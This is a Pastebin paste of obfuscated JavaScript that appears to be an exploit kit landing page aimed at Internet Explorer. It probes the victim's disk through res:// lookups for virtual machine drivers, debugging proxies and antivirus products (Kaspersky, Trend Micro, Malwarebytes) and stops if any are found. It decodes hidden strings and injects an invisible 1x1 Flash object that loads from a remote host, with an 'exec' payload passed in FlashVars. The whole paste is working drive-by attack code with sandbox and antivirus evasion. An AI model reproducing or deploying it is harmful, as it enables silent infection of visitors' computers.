Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- window['rXWbJsIp'] = '1';
- var i_a = [];
- function mrkA() {
- window['OIIiUFlL'] = true;
- window['rXWbJsIp'] = '';
- window.fvOWbauMcjLj = false;
- window.fvOWbauMcjLs = false;
- window.fvOWbauMcjLf1 = false;
- window.fvOWbauMcjLf2 = false;
- }
- function mrkV() {
- window['RTFYSzh'] = true;
- }
- function Check(rpath, rr) {
- var ac = ['RTFYSzh', 'OIIiUFlL', mrkV, mrkA];
- if (window[ac[rr]]) return;
- var el = document.createElement('script');
- if (!window['MSInputMethodContext']) el['language'] = 'some';
- el.onload = function() {
- ac[rr + 2]();
- };
- el.src = 'res://' + rpath + '/#16/#1';
- el['onreadystatechange'] = function() {
- var r = this['readyState'];
- if (r == 'complete' || r == 'loaded') {
- ac[rr + 2]();
- }
- };
- document.body.appendChild(el);
- }
- function Check_pf(f, r) {
- Check("C:\\Program Files\\" + f, r);
- Check("C:\\Program Files (x86)\\" + f, r);
- }
- function CheckAll() {
- if (navigator.userAgent.indexOf('MSIE') == -1 && navigator.appVersion.indexOf('Trident/') == -1) {
- return;
- }
- var kvx, x0 = 'Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.',
- x1 = x0 + '1',
- x2 = x0 + '4_5_0.1';
- try {
- kvx = new ActiveXObject(x1);
- } catch (e) {
- kvx = false;
- try {
- kvx = new ActiveXObject(x2);
- } catch (e) {
- kvx = false;
- }
- }
- if (kvx) {
- mrkA();
- return;
- }
- if (document.all && !window.XMLHttpRequest) {
- return;
- }
- var path_sys32 = "\\Windows\\System32\\drivers\\",
- kp0 = "Kaspersky Lab\\Kaspersky ",
- kp_a = "Anti-Virus ",
- kp_i = "Internet Security ",
- kp_t = "Total Security ",
- kp_p = "PURE",
- kp_c = "CRYSTAL ",
- kp1 = "\\shellex.dll",
- kp2 = "\\mfc42.dll",
- kp3 = "\\avzkrnl.dll",
- vm_s = ["vm3dmp", "vmusbmouse", "vmmouse", "vmhgfs", "VBoxGuest", "VBoxMouse", "VBoxSF", "VBoxVideo", "prl_time"],
- vm_p = ['Fiddler2\\Fiddler.exe', 'VMware\\VMware Tools\\TPAutoConnSvc.exe', 'Oracle\\VirtualBox Guest Additions\\uninst.exe', 'Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe'],
- av_s = ["kl1", "tmactmon", "tmcomm", "tmevtmgr", "TMEBC32", "tmeext", "tmnciesc", "tmtdi", "mbam"],
- av_p = ["Malwarebytes Anti-Exploit\\mbae.exe", "Malwarebytes Anti-Malware\\mbam.exe", "FiddlerCoreAPI\\FiddlerCore.dll", "Trend Micro\\Titanium\\TmConfig.dll", "Trend Micro\\Titanium\\TmSystemChecking.dll", kp0 + kp_a + '6.0 for Windows Workstations' + kp1, kp0 + kp_a + '6.0' + kp1, kp0 + kp_a + '7.0' + kp1, kp0 + kp_a + '2009' + kp2, kp0 + kp_a + '2010' + kp2, kp0 + kp_a + '2011' + kp3, kp0 + kp_a + '2012\\x86' + kp2, kp0 + kp_a + '2013\\x86' + kp2, kp0 + kp_a + '14.0.0\\x86' + kp2, kp0 + kp_a + '15.0.0\\x86' + kp2, kp0 + kp_a + '15.0.1\\x86' + kp2, kp0 + kp_a + '15.0.2\\x86' + kp2, kp0 + kp_i + '6.0' + kp1, kp0 + kp_i + '7.0' + kp1, kp0 + kp_i + '2009' + kp2, kp0 + kp_i + '2010' + kp2, kp0 + kp_i + '2011' + kp3, kp0 + kp_i + '2012\\x86' + kp2, kp0 + kp_i + '2013\\x86' + kp2, kp0 + kp_i + '14.0.0\\x86' + kp2, kp0 + kp_i + '15.0.0\\x86' + kp2, kp0 + kp_i + '15.0.1\\x86' + kp2, kp0 + kp_i + '15.0.2\\x86' + kp2, kp0 + kp_t + '14.0.0\\x86' + kp2, kp0 + kp_t + '15.0.0\\x86' + kp2, kp0 + kp_t + '15.0.1\\x86' + kp2, kp0 + kp_t + '15.0.2\\x86' + kp2, kp0 + kp_p + kp2, kp0 + kp_p + ' 2.0\\x86' + kp2, kp0 + kp_p + ' 3.0\\x86' + kp2, kp0 + kp_c + '3.0\\x86' + kp2];
- for (var i = 0; i < vm_s.length; i++) {
- Check(path_sys32 + vm_s[i] + '.sys', 0);
- }
- for (var i = 0; i < vm_p.length; i++) {
- Check_pf(vm_p[i], 0);
- }
- for (var i = 0; i < av_s.length; i++) {
- Check(path_sys32 + av_s[i] + '.sys', 1);
- }
- for (var i = 0; i < av_p.length; i++) {
- Check_pf(av_p[i], 1);
- }
- }
- function holdC(millis) {
- var date = new Date();
- var curDate = null;
- do {
- curDate = new Date();
- } while (curDate - date < millis);
- }
- CheckAll();
- holdC(500);
- window.fvOWbauMcjLf1 = true;
- if (!Array.prototype.indexOf) {
- Array.prototype.indexOf = function(obj, start) {
- for (var i = (start || 0), j = this.length; i < j; i++) {
- if (this[i] === obj) {
- return i;
- }
- }
- return -1;
- };
- }
- var p = 'push',
- i = 'indexOf';
- window["DmjslCQ"] = new Function('text', "var cryptKey = zEwVfv1zEwVfv3, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray." + p + "(rawArray." + i + "(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");
- var Browser = {
- Version: function() {
- try {
- var birks = /malware.dontneedcoffee.com/.test();
- } catch (e) {}
- var version = 999;
- if (navigator.appVersion.indexOf("MSIE") != -1) version = parseFloat(navigator.appVersion.split("MSIE")[1]);
- return version;
- }
- };
- if (window.fvOWbauMcjLf1) {
- var klfg1 = 'wri',
- klfg2 = 'te';
- function getKolaio() {
- return DmjslCQ(zEwVfk1zEwVfk3);
- }
- function getTxl(a) {
- return DmjslCQ(zEwVfh1zEwVfh3);
- }
- function getData(a) {
- return DmjslCQ(zEwVfn1zEwVfn3);
- }
- var mirtul = "1";
- var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf">';
- txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
- txt = txt + '<param name="play" value="true"/>';
- txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" />';
- txt = txt + '<!--[if !IE]>-->';
- txt = txt + '<object type="application/x-shockwave-flash" data="http://' + getKolaio() + '/' + getTxl(mirtul) + '" allowScriptAccess=always width="1" height="1">';
- txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
- txt = txt + '<param name="play" value="true"/>';
- txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" />';
- txt = txt + '<!--<![endif]-->';
- txt = txt + '<!--[if !IE]>--></object><!--<![endif]-->';
- txt = txt + '</object>';
- try {;
- } catch (e) {}
- document.getElementById("T6Fe3dfg").innerHTML = txt;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement